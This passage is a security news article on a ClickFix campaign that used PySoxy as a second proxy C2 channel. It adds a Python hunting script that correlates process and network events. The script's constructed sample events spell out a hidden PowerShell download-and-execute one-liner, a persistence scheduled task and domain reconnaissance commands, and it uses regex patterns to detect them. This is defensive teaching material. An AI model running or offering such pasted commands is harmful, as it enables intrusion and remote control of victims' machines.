
As the researchers pointed out in a blog post, PySoxy gives attackers encrypted proxy access without relying on well-known malware or remote monitoring and management (RMM) tools. The observed attack chain first established a PowerShell-based C2 channel, then opened a second C2 path through PySoxy.
The campaign was observed in April. ReliaQuest said this was the first time it had seen ClickFix combined with PySoxy in active intrusions.
PySoxy used for dual-channel persistence
The attack started with a ClickFix lure that tricked the victim into manually pasting and executing a malicious command disguised as a fix to a technical issue. Once launched, the command initiated a multi-stage infection chain.
According to ReliaQuest, the execution flow established persistence through scheduled tasks, carried out domain reconnaissance, and opened an initial PowerShell-based C2 channel back to the attackers. The chain then deployed PySoxy to create a second encrypted communication path, turning the infected endpoint into a proxy relay.
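The chain described above (pasted PowerShell one-liner, scheduled-task persistence, domain recon, a PowerShell C2 connection and then a Python process opening its own outbound channel) is the kind of sequence a hunter would correlate across process and network telemetry rather than match on any single indicator. The following is an added example written for this article, not ReliaQuest's detection content and not code from the PySoxy project. The event records are constructed, loosely shaped like Sysmon process-create and network-connect events; the command lines, PIDs, IP addresses, the script name pysoxy.py and the choice of which switches count as "ClickFix-like" are all assumptions, not observations from the campaign.

```python
"""Correlate a ClickFix-style PowerShell launch with follow-on stages in the
same process tree. Added example with constructed telemetry; field names
approximate Sysmon Event ID 1 (process) and 3 (network) but are not a real capture."""
import ipaddress
import re
from collections import defaultdict

# Constructed events for one host. PIDs, commands and addresses are invented.
EVENTS = [
    {"type": "process", "pid": 100, "ppid": 1, "image": "explorer.exe", "cmd": "explorer.exe"},
    # ClickFix: the victim pastes the command into the Run dialog, so explorer.exe is the parent (assumption).
    {"type": "process", "pid": 200, "ppid": 100, "image": "powershell.exe",
     "cmd": 'powershell.exe -w hidden -nop -ep bypass -c "iex (irm https://example.invalid/fix)"'},
    {"type": "process", "pid": 201, "ppid": 200, "image": "schtasks.exe",
     "cmd": 'schtasks.exe /create /sc minute /mo 5 /tn "Updater" /tr "powershell.exe -w hidden -f C:\\Users\\Public\\u.ps1" /f'},
    {"type": "process", "pid": 202, "ppid": 200, "image": "nltest.exe", "cmd": "nltest.exe /dclist:"},
    {"type": "process", "pid": 203, "ppid": 200, "image": "net.exe", "cmd": 'net.exe group "domain admins" /domain'},
    {"type": "network", "pid": 200, "dst": "203.0.113.7", "dport": 443},          # PowerShell C2 channel
    {"type": "process", "pid": 300, "ppid": 200, "image": "python.exe",
     "cmd": "python.exe C:\\Users\\Public\\pysoxy.py"},                            # hypothetical script name
    {"type": "network", "pid": 300, "dst": "198.51.100.9", "dport": 8443},        # second channel via Python
    # Benign admin activity in a separate tree; must not be flagged.
    {"type": "process", "pid": 400, "ppid": 1, "image": "powershell.exe", "cmd": "powershell.exe Get-Process"},
    {"type": "process", "pid": 401, "ppid": 400, "image": "schtasks.exe", "cmd": "schtasks.exe /query"},
]

# Only RFC1918 and loopback are treated as internal here; the sample uses
# documentation ranges (203.0.113.0/24, 198.51.100.0/24) as stand-ins for the internet.
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL)


def is_clickfix_launch(e):
    # PowerShell started with the hide-window / download-and-run switches typical of a pasted one-liner.
    return e["image"].lower() == "powershell.exe" and re.search(
        r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|\biex\b|\birm\b|downloadstring", e["cmd"], re.I) is not None


def is_sched_task_create(e):
    return e["image"].lower() == "schtasks.exe" and "/create" in e["cmd"].lower()


def is_domain_recon(e):
    return e["image"].lower() in ("nltest.exe", "net.exe", "whoami.exe") and re.search(
        r"/dclist|/domain_trusts|/domain\b|/all\b", e["cmd"], re.I) is not None


def find_chains(events):
    """Return one finding per ClickFix-like PowerShell root whose subtree shows >= 2 follow-on stages."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    conns = defaultdict(list)
    for e in events:
        if e["type"] == "network":
            conns[e["pid"]].append(e)
    children = defaultdict(list)
    for e in procs.values():
        children[e["ppid"]].append(e["pid"])

    def subtree(pid):
        out, stack = [], [pid]
        while stack:
            p = stack.pop()
            out.append(p)
            stack.extend(children[p])
        return out

    findings = []
    for root in procs.values():
        if not is_clickfix_launch(root):
            continue
        stages = {"clickfix_launch"}
        for pid in subtree(root["pid"]):
            p = procs[pid]
            if is_sched_task_create(p):
                stages.add("persistence")
            if is_domain_recon(p):
                stages.add("domain_recon")
            external = [c for c in conns[pid] if is_external(c["dst"])]
            if pid == root["pid"] and external:
                stages.add("powershell_c2")
            if p["image"].lower() in ("python.exe", "pythonw.exe") and external:
                stages.add("python_proxy_channel")  # second, separately-connected channel
        if len(stages) >= 3:
            findings.append({"root_pid": root["pid"],
                             "parent": procs.get(root["ppid"], {}).get("image"),
                             "stages": sorted(stages)})
    return findings


if __name__ == "__main__":
    for f in find_chains(EVENTS):
        print(f)
```

The tree walk is what makes this useful: a lone `schtasks /create` or a lone Python process with an outbound socket is noisy on its own, but both hanging off a hidden, download-and-execute PowerShell instance spawned from the shell is the shape of the chain the article describes. In a real pipeline the three matcher functions would be replaced with your EDR's query language and the subtree built from its process GUIDs rather than reusable PIDs.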
